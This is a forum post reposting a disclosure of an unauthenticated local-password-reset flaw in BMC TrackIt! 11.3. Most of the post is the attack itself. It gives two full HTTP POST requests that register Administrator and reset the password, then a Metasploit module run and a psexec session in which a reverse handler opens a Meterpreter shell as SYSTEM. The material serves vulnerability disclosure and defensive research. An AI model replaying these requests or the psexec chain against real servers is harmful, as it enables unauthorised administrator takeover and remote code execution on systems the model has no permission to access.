Aerosol Posted December 12, 2014 Report Posted December 12, 2014 BMC TrackIt! 11.3 Unauthenticated Local User Password ChangeTrial available here: http://www.trackit.comA Metasploit pull request has been made here:https://github.com/rapid7/metasploit-framework/pull/4359BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticateduser to change any local user's password, such as Administrator. If theability to log in remotely via SMB is enabled on the server, this can yieldan unauthenticated user a shell of SYSTEM using the psexec module inMetasploit. This was tested against Windows Server 2008 R2 in a relativelydefault (trackit installs SQL server) installation. A domain was set up andthe web server was added to the domain. Domain credentials were not able tobe set, only local users.Using the Registration link in the top right of the/PasswordReset/Application/Main page, the UI requires the user's passwordto continue. However, the request made after to actually register the localuser is disparate from the authentication request and can be sentindependently. This allows an unauthenticated user to now reset that user'spassword. Because the Password Reset form makes a separate distinct requestto check the answers to the secret question, the request to actually changea user's password can be made as any user.The first request looks like:POST /PasswordReset/Application/Register HTTP/1.1Host: 192.168.1.57User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://192.168.1.57/PasswordResetContent-Length: 318Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heotConnection: keep-alivePragma: no-cacheCache-Control: no-cachedomainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%40fdsafdsa.com&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=notA valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/and using the subsequent Set-Cookie in all subsequent requests as thecookie. The domainname parameter can the the name of the computer, which isthe default value on the registration page. The userName parameter is theuser to register with the application. You can attempt this is with a useralready registered with no issue (though probably changing the secretanswers to known values is probably bad too).The second request looks like this:POST /PasswordReset/Application/ResetPassword HTTP/1.1Host: 192.168.1.57User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://192.168.1.57/PasswordReset/Application/MainContent-Length: 92Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=AdministratorConnection: keep-alivePragma: no-cacheCache-Control: no-cachenewPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=trueThe domain and UserName parameters should match those supplied in theprevious registration request. The newPassword parameter will need to meetany local standard enforced by GPO.Combining these two requests will allow an unauthorised user to register alocal user to be elegible for a password reset via the password reset form,then take advantage of the subsequent password reset vulnerability tochange the password of any local user, including Administrator.Supplied is a metasploit auxiliary module which will change the password ofthe Administrator user by default, then print the domain, username, andpassword to user with psexec in order to log in over SMB.The below Metasploit run details changing the password with the attachedmodule. Setting the password to the one reported by the auxiliary module,psexec is run again and a shell as NT USER/SYSTEM is gained.msf auxiliary(bmc_trackit_pwd_reset) > show optionsModule options (auxiliary/gather/bmc_trackit_pwd_reset): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN no The domain of the user. By defaultthe local user's computer name will be autodetected LOCALUSER Administrator yes The local user to change passwordfor Proxies no Use a proxy chain RHOST 192.168.1.57 yes The target address RPORT 80 yes The target port TARGETURI / yes The path to BMC TrackIt VHOST no HTTP server virtual hostmsf auxiliary(bmc_trackit_pwd_reset) > run[*] Please run the psexec module using:[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1[*] Auxiliary module execution completedmsf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexecmsf exploit(psexec) >msf exploit(psexec) > set SMBPass qGSvnJeuNO!1SMBPass => qGSvnJeuNO!1msf exploit(psexec) > exploit[*] Started reverse handler on 192.168.1.31:4444[*] Connecting to the server...[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...[*] Uploading payload...[*] Created \fNRBQEMV.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl]...[*] Obtaining a service manager handle...[*] Creating a new service (NOAlMwJR - "MBvX")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting \fNRBQEMV.exe...[*] Sending stage (769024 bytes) to 192.168.1.57[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668)at 2014-10-12 00:44:12 -0500meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter >-- http://volatile-minds.blogspot.com -- bloghttp://www.volatileminds.net -- websiteSource Quote
